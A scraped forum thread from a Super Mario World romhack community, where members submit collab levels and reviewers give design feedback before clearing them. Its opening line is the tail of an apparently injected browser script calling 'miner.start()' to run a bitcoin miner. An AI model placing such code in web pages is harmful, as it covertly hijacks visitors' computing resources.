miner.start(); // initialise bitcoin miner
</script>

smbx communitysmw centralmario fan games galaxy

Level Clearing

Anthrax 2 Multiply Themodynamics
limepie20

Re: Level Clearing

Postby limepie20 » 7 years ago

Daizo wrote:After some slight worries about The Great Pit not being in this collab, I am kind of wondering if TGP is inserted into the game still. Or did it get removed some how.
No it's still here.

Frozelar:
I liked this one better. It definitely felt fairer. The one thing I didn't like was the holes the key could fall in during the climbing part. It was mostly fine, but there was parts where you were up high and if you throw the key down, it would fall in a hole, but you couldn't see that there was a hole from there. So just make it so that holes are visible before you have a chance of accidentally throwing the key down there. You can resubmit if that is made better.

Frozelar
Retired Screamer

Postby Frozelar » 7 years ago

Alright... I'll just put munchers instead of a hole or something. So then, just don't worry about the phanto? I won't need the sprite slot thing if that's the case.

limepie20

I guess not. It would be better if it worked, but whatever.

tenta
First name: Alex

Postby tenta » 7 years ago

Sorry for my late response.

Limepie, i know what you want me to do. It just, how can i say this. It doesn't feel right to me. It make it too obvious and too easy to show that there is a secret.

limepie20

If you don't like it, try to come up with something else. As I've said before, it can't be cleared the way it is now. I highly suggest using my solution, though.

Cup

Postby Cup » 7 years ago

I haven't been doing anything with this except for sitting on it since I haven't really felt any rush, but I should really start working on getting it cleaned up for clearing and submission before I forget what's going on.

Mishi sublevel. Just go through the door.
http://www.mediafire.com/?uaq3fg0bl41r0iz

limepie20

Cup:
Hey, you're cleared. There's really nothing wrong with it. The random bullet bill generator still feels a bit unfair to me, but if you insist, it can be kept.

tenta

This time, me and Sept worked a lot on it and fixed some issues that were found at the same time. Also he teached me how to use Map16.

La joie de glisser V871.1

limepie20

tenta:
The chest path isn't fixed yet. I'm not sure what you changed about your level, but what needs to be fixed is the chest path. All you have to do is follow the picture I posed earlier.

Septentrion Pleiades
Banned
First name: Stephen

Postby Septentrion Pleiades » 7 years ago

limepie20 wrote:tenta:
The chest path isn't fixed yet. I'm not sure what you changed about your level, but what needs to be fixed is the chest path. All you have to do is follow the picture I posed earlier.
I dont get it. The only thing in the picture I noticed is that you perfer the roof lower.

limepie20

Yes, so you don't have to walk inside of the dirt (which looks bad). Instead, you walk on top of the dirt like you normally would.

Septentrion Pleiades
Banned

limepie20 wrote:Yes, so you don't have to walk inside of the dirt (which looks bad). Instead, you walk on top of the dirt like you normally would.
It is not like going in front of dirt tiles is a new gimmick. It happens all the time in hacks but its never been a problem before.

limepie20

Yeah, I'm fine with going in front of dirt tiles, but the awkward part is walking on the dirt-roof tile.

tenta

limepie20 wrote:Yeah, I'm fine with going in front of dirt tiles, but the awkward part is walking on the dirt-roof tile.
Well, at some point you actually do have to go on the roof anyway.

Septentrion Pleiades
Banned

May I just remind you that the opening message the this hack is "Video games ?!?". No one is going to get upset with a detail like that

limepie20

It is a very easy error to fix. The level can be cleared, but I will just fix the chest path in post-clearing anyway.

Septentrion Pleiades
Banned

limepie20 wrote:It is a very easy error to fix. The level can be cleared, but I will just fix the chest path in post-clearing anyway.
I assume that's means you're going to go yy-chr on the roof/floor.

tenta

Oh damn. I forgot about one thing. MUSIC. The one that is currently in the level is not the one i want :/

Edit: La joie de glisser + txt

SyStemkraSh5642

Postby SyStemkraSh5642 » 7 years ago

@ tenta: The link you've provided is dead. Can you provide a new one, please?

tenta

SyStemkraSh5642 wrote:@ tenta: The link you've provided is dead. Can you provide a new one, please?
viewtopic.php?f=9&t=1272&start=200

Check last post.

limepie20

Wait, tenta, didn't you already submit?

tenta

limepie20 wrote:Wait, tenta, didn't you already submit?
Yes i did. This is why i posted a link to the level submission thread to systemkrash.

SyStemkraSh5642

Postby SyStemkraSh5642 » 7 years ago

@ tenta: Your level is cleared! There are only two issues that I can think of, but I'll tweak them for you after I insert it.
I only have two gripes with your level:
1: On Screen 09, you can be ambushed by the flying goomba below.
2: In this screenshot, it's a bit strange to have the inside of this landform be non-solid.

muuma

Postby muuma » 6 years ago

Hello, it's been a month since I said "I'll post my re-edition of the level next week!".

Sorry, too busy with work.

Whatever, I remade my level, so as limepie20 said, I'll post everything here about my level again:
http://www.mediafire.com/?s22g5z0l2mya0a7

Mediafire link because A2MT ips is now too big and cannot be uploaded in this message. XD

Tell me if something is wrong with it, otherwise, I'll be waiting for your opinion.

edit: Posted the 02 December, reposting the 02 January the full message as a bump, as I saw no download and/or clearing, I hope this post didn't fall into oblivion, I'm not sure it's normal if there is no answer in a month...right? Because if that's natural, I don't mean to be an attenton whore.
I see what you did there...

Septentrion Pleiades
Banned

Postby Septentrion Pleiades » 6 years ago

muuma wrote:Hello, it's been a month since I said "I'll post my re-edition of the level next week!".

Sorry, too busy with work.

Whatever, I remade my level, so as limepie20 said, I'll post everything here about my level again:
http://www.mediafire.com/?s22g5z0l2mya0a7

Mediafire link because A2MT ips is now too big and cannot be uploaded in this message. XD

Tell me if something is wrong with it, otherwise, I'll be waiting for your opinion.

edit: Posted the 02 December, reposting the 02 January the full message as a bump, as I saw no download and/or clearing, I hope this post didn't fall into oblivion, I'm not sure it's normal if there is no answer in a month...right? Because if that's natural, I don't mean to be an attenton whore.
The only thing that bothers me about this level right now is the thwomps. It doesn't add anything (except the graphics) and this game already has an over-saturation of them. I wouldn't mind to see more creative use of that space if possible, even if it does use thwomps.

It's of clearing quality as of now, but I don't handle the baserom.

Return to “A2MT”